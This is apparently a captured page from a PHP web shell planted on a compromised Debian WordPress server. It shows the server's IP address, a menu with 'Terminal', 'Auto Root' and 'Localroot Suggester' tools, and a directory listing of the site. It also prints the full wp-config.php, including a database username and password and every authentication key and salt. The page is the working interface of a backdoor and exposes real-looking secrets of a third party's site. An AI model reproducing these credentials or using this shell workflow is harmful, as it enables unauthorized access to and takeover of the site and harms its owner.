Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.173
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
html_old /
ctm-euromeuble.fr /
Delete
Unzip
Name
Size
Permission
Date
Action
error
[ DIR ]
drwxrwxrwx
2020-09-03 20:12
stats
[ DIR ]
drwxrwxrwx
2023-01-18 07:38
wp-admin
[ DIR ]
drwxrwxrwx
2023-01-18 07:38
wp-content
[ DIR ]
drwxrwxrwx
2022-07-02 09:31
wp-includes
[ DIR ]
drwxrwxrwx
2022-07-02 09:35
.htaccess
197
B
-r--r--r--
2025-10-25 04:45
index.php
418
B
-r--r--r--
2022-07-02 09:12
info.php
204
B
-rwxrwxrwx
2020-09-03 20:12
license.txt
19.09
KB
-rwxrwxrwx
2020-09-03 20:12
readme.html
7.24
KB
-rwxrwxrwx
2020-09-03 20:12
wp-activate.php
5.32
KB
-rwxrwxrwx
2020-09-03 20:12
wp-blog-header.php
3.09
KB
-r--r--r--
2025-10-25 04:45
wp-comments-post.php
1.59
KB
-rwxrwxrwx
2020-09-03 20:12
wp-config-sample.php
3.5
KB
-rwxrwxrwx
2020-09-03 20:12
wp-config.php
3.11
KB
-rwxrwxrwx
2020-09-04 09:18
wp-cron.php
5.94
KB
-rw-r--r--
2025-10-25 04:45
wp-links-opml.php
2.37
KB
-rwxrwxrwx
2020-09-03 20:12
wp-load.php
3.22
KB
-rwxrwxrwx
2020-09-03 20:12
wp-login.php
33.52
KB
-rwxrwxrwx
2020-09-03 20:12
wp-mail.php
7.86
KB
-rwxrwxrwx
2020-09-03 20:12
wp-settings.php
15.82
KB
-rwxrwxrwx
2020-09-03 20:12
wp-signup.php
29.22
KB
-rwxrwxrwx
2020-09-03 20:12
wp-trackback.php
4.41
KB
-rwxrwxrwx
2020-09-03 20:12
xmlrpc.php
2.99
KB
-rwxrwxrwx
2020-09-03 20:12
Save
Rename
<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the * installation. You don't have to use the web site, you can * copy this file to "wp-config.php" and fill in the values. * * This file contains the following configurations: * * * MySQL settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://codex.wordpress.org/Editing_wp-config.php * * @package WordPress */ #define( 'WP_DEBUG', true ); #define( 'WP_DEBUG_LOG', '/tmp/wp-errors.log' ); // ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define('DB_NAME', 'wp_ctm_2019'); /** MySQL database username */ define('DB_USER', 'lamp'); /** MySQL database password */ define('DB_PASSWORD', 'Vo4nMSdkSAah'); /** MySQL hostname */ define('DB_HOST', 'localhost'); /** Database Charset to use in creating database tables. */ define('DB_CHARSET', 'utf8mb4'); /** The Database Collate type. Don't change this if in doubt. */ define('DB_COLLATE', ''); /**#@+ * Authentication Unique Keys and Salts. * * Change these to different unique phrases! * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service} * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again. * * @since 2.6.0 */ define('AUTH_KEY', '$m]ck/mNqCAWM/iMNn4D84`9#C5f.6Dj<PP`r{}:SqNRkCw{9]&]kTb {;YQ4R!m'); define('SECURE_AUTH_KEY', 'Ib,S+Ro/SWt ?XU8AozFW;C]mfapPKHNHW%o33 ;<pm:}!T$RvgLL/}k!iVBFLo;'); define('LOGGED_IN_KEY', 'YVz-^E/0v%r8>![[8^~68#$r3ZnQc-WqpqUe$ZnkLh^a]Q{,D*GKdsOB+P&]<*=M'); define('NONCE_KEY', ',R.`:z8c`[_Tyn8({iJQ^EB03#VdPJ${v ^&AMiv<f,9l) }z@s.CV3gcCoc0oYT'); define('AUTH_SALT', '^5xKjdvj1bu|sWYyY- cZ#h3/nCB!B~*J|0UlvbA{`8Zsc(>=TxP]dmxPp[WJM[t'); define('SECURE_AUTH_SALT', '_4|&|9.Zbp%sWc{8e$=cThZtd:C_Bo*>]G;T;92h[W`VAIt`fgBRvW/wOjM|s+;s'); define('LOGGED_IN_SALT', 'hu.0gT@;7!_y=5s7h7%B[du?ij$J0Ek9To4h6~Ky&>]]2.0jF,XTRyS$rV8tT> t'); define('NONCE_SALT', '`CjW+i.@1FmH>*CI?M_9tSK+g9TNN}4C4.%bPP+]3G1!9770x!`ox+;.7Kg77is/'); define('WP_TEMP_DIR', dirname(__FILE__) . '/wp-content/temp/'); /**#@-*/ /** * WordPress Database Table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wp_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the Codex. * * @link https://codex.wordpress.org/Debugging_in_WordPress */ define('WP_DEBUG', false); /* That's all, stop editing! Happy blogging. */ /** Absolute path to the WordPress directory. */ if ( !defined('ABSPATH') ) define('ABSPATH', dirname(__FILE__) . '/'); /** Sets up WordPress vars and included files. */ require_once(ABSPATH . 'wp-settings.php');